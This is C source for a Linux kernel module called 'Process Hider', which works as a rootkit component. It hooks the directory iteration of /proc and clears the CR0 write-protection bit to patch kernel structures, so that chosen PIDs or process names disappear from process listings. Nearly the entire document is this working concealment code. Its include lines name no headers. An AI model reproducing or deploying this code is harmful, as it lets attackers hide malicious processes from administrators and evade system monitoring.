#include #include #include #include #include #include #include #include #include #include #include #include #include #include MODULE_LICENSE("GPL"); MODULE_AUTHOR("Biswa Kalyan Bhuyan"); MODULE_DESCRIPTION("Process Hider - Hides processes from listings"); MODULE_VERSION("0.1"); /* Module parameters */ static unsigned int hide_pid = 0; module_param(hide_pid, uint, 0644); MODULE_PARM_DESC(hide_pid, "Specific PID to hide"); static char* hide_process = NULL; module_param(hide_process, charp, 0644); MODULE_PARM_DESC(hide_process, "Process name to hide"); /* Hook-related variables */ static struct file_operations *proc_fops; static filldir_t orig_proc_filldir; static int (*orig_iterate_shared)(struct file *, struct dir_context *); static struct path proc_path; /* Function to find process by PID */ static struct task_struct *find_process_by_pid(unsigned int pid) { struct task_struct *task; for_each_process(task) { if (task->pid == pid) return task; } return NULL; } /* Should we hide this process? */ static int should_hide_proc(const char *name) { struct task_struct *task; long pid; // First check if it's a PID directory if (kstrtol(name, 10, &pid) == 0) { // It's a numeric directory, so it could be a PID task = find_process_by_pid((unsigned int)pid); if (task) { // Check if this is our target PID if (hide_pid > 0 && task->pid == hide_pid) { return 1; // Hide the specified PID } // Check if process name matches hide_process if (hide_process && strlen(hide_process) > 0 && strncmp(task->comm, hide_process, TASK_COMM_LEN) == 0) { return 1; // Hide processes with matching name } } } return 0; // Don't hide this one } /* Custom filldir function to filter directory entries */ static int proc_filldir(struct dir_context *ctx, const char *name, int namlen, loff_t offset, u64 ino, unsigned int d_type) { // Check if we should hide this entry if (should_hide_proc(name)) { printk(KERN_INFO "ProcHider: Hiding process entry: %s\n", name); return 0; // Skip this entry } // Otherwise, call the original filldir return orig_proc_filldir(ctx, name, namlen, offset, ino, d_type); } /* Custom iterate_shared function to hook directory listing */ static int proc_iterate_shared(struct file *file, struct dir_context *ctx) { // Replace the filldir function with our custom one orig_proc_filldir = ctx->actor; // Cast to ensure it's the same type ctx->actor = (filldir_t)proc_filldir; // Call the original iterate_shared with our modified context return orig_iterate_shared(file, ctx); } /* Function to set up hooking of /proc directory */ static void hook_proc(void) { // Get the path to /proc if (kern_path("/proc", 0, &proc_path)) { printk(KERN_ERR "ProcHider: Failed to get /proc path\n"); return; } // Get the file operations for /proc proc_fops = (struct file_operations *)proc_path.dentry->d_inode->i_fop; // Save the original iterate_shared function orig_iterate_shared = proc_fops->iterate_shared; // Replace with our custom function write_cr0(read_cr0() & ~0x10000); // Disable write protection proc_fops->iterate_shared = proc_iterate_shared; write_cr0(read_cr0() | 0x10000); // Enable write protection printk(KERN_INFO "ProcHider: Successfully hooked /proc directory operations\n"); } /* Function to unhook /proc directory */ static void unhook_proc(void) { // Restore the original iterate_shared function if (proc_fops && orig_iterate_shared) { write_cr0(read_cr0() & ~0x10000); // Disable write protection proc_fops->iterate_shared = orig_iterate_shared; write_cr0(read_cr0() | 0x10000); // Enable write protection printk(KERN_INFO "ProcHider: Restored original /proc directory operations\n"); } // Release the path path_put(&proc_path); } static int __init proc_hider_init(void) { printk(KERN_INFO "ProcHider: Module loaded\n"); // Check if we have parameters to work with if (hide_pid == 0 && (hide_process == NULL || strlen(hide_process) == 0)) { printk(KERN_INFO "ProcHider: No hiding parameters specified.\n"); printk(KERN_INFO "ProcHider: Use 'hide_pid' or 'hide_process' parameters\n"); return 0; } // If hiding by PID, check if the PID exists if (hide_pid > 0) { struct task_struct *task = find_process_by_pid(hide_pid); if (task) { printk(KERN_INFO "ProcHider: Will hide PID %u (%s)\n", task->pid, task->comm); } else { printk(KERN_INFO "ProcHider: Target PID %u not found\n", hide_pid); // Continue anyway in case the process appears later } } // If hiding by process name, report how many matching processes exist if (hide_process && strlen(hide_process) > 0) { struct task_struct *task; int count = 0; printk(KERN_INFO "ProcHider: Will hide processes named '%s'\n", hide_process); for_each_process(task) { if (strncmp(task->comm, hide_process, TASK_COMM_LEN) == 0) { printk(KERN_INFO "ProcHider: Will hide matching process: PID %d\n", task->pid); count++; } } printk(KERN_INFO "ProcHider: Found %d processes named '%s' to hide\n", count, hide_process); } // Set up the hook hook_proc(); printk(KERN_INFO "ProcHider: Process hiding activated\n"); return 0; } static void __exit proc_hider_exit(void) { printk(KERN_INFO "ProcHider: Module unloading\n"); // Unhook everything unhook_proc(); if (hide_pid > 0) { printk(KERN_INFO "ProcHider: No longer hiding PID %u\n", hide_pid); } if (hide_process && strlen(hide_process) > 0) { printk(KERN_INFO "ProcHider: No longer hiding '%s' processes\n", hide_process); } printk(KERN_INFO "ProcHider: Module unloaded\n"); } module_init(proc_hider_init); module_exit(proc_hider_exit);